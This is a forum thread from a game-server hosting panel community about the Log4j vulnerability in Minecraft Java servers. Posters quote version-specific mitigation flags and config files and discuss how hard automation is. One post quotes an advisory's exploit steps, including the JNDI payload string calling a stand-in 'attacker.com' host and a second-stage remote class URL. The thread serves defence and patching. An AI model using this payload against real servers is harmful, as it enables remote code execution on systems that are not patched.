Jump to content

Minecraft Java critical vulnerability


qspider

Recommended Posts

Please note: The TCAdminCrons plugin (https://community.tcadmin.com/files/file/59-tcadmincrons/) uses ServerJars to get updates. ServerJars has not compiled patched versions yet, and I'm not sure they are going to (at least for old versions).

If you provide patched versions, you will need to remove all affected versions from TCAdmin and run the TCAdminCrons plugin again. The plugin will not overwrite existing updates in TCAdmin.

 

Also, as far as I understand, this is not a security issue for your servers. It affects clients, not servers.
If I'm wrong, please tell me.

Link to comment
Share on other sites

10 hours ago, Dennis said:

Also, as far as I understand, this is not a security issue for your servers. It affects clients, not servers.
If I'm wrong, please tell me.

The way I'm reading this it affects all Minecraft servers using Java 8 and above. User injects code through console and it gets logged. Exploit process begins. I could be wrong though. 😆

https://www.lunasec.io/docs/blog/log4j-zero-day/
Exploit Steps

  1. Data from the User gets sent to the server (via any protocol),
  2. The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server),
  3. The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI),
  4. This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process,
  5. This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.

Exploit Requirements

  • A server with a vulnerable log4j version (listed above),
  • an endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send the exploit string,
  • and a log statement that logs out the string from that request.
Link to comment
Share on other sites

Quote

Summary of the instructions:
- If possible please update to 1.18.1, if you're not able to do so, please follow the same approach as Minecraft 1.17.X
- Minecraft 1.17.X
Add the following JVM arguments to your startup command line -Dlog4j2.formatMsgNoLookups=true
- 1.12-1.16.5
Download this file (https://launcher.mojang.com/v1/objects/02937d122c86ce73319ef9975b58896fc1b491d1/log4j2_112-116.xml) to the working directory where your server runs. Then add the following JVM arguments to your startup command line: 
-Dlog4j.configurationFile=log4j2_112-116.xml
- 1.7-1.11.2
Download this file (https://launcher.mojang.com/v1/objects/dd2b723346a8dcd48e7f4d245f6bf09e98db9696/log4j2_17-111.xml) to the working directory where your server runs. Then add the following JVM arguments to your  startup command line: 
-Dlog4j.configurationFile=log4j2_17-111.xml
Versions below 1.7 are not affected

You guys can make different commandlines with the different flags.

Edited by SHAD0WRAIDERZA
Link to comment
Share on other sites

Absolutely this can be fixed for the pre-built packs and versions you provide in TCA.

However, in real life it is not that easy to enforce this fix when users are able to upload and run any version of MC and older pre-built modpacks. And the Updates does not allow for custom commandlines so it needs to be scripted for every update.

The panel needs to know what version the server is on and apply the correct startup variable. If the wrong command is used (ex: -Dlog4j2.formatMsgNoLookups=true on a 1.16 server) it will fail to start.

Link to comment
Share on other sites

I might've spoken too soon.

We detect the version of Java required based on the headeres in the .class files. There doesn't seem to be an easy way of knowing what version of Minecraft a specific jar file is. I can find it by manually searching the class files, but automating this process is almost impossible.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Who's Online   0 Members, 0 Anonymous, 10 Guests (See full list)

    • There are no registered users currently online
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue. Terms of Use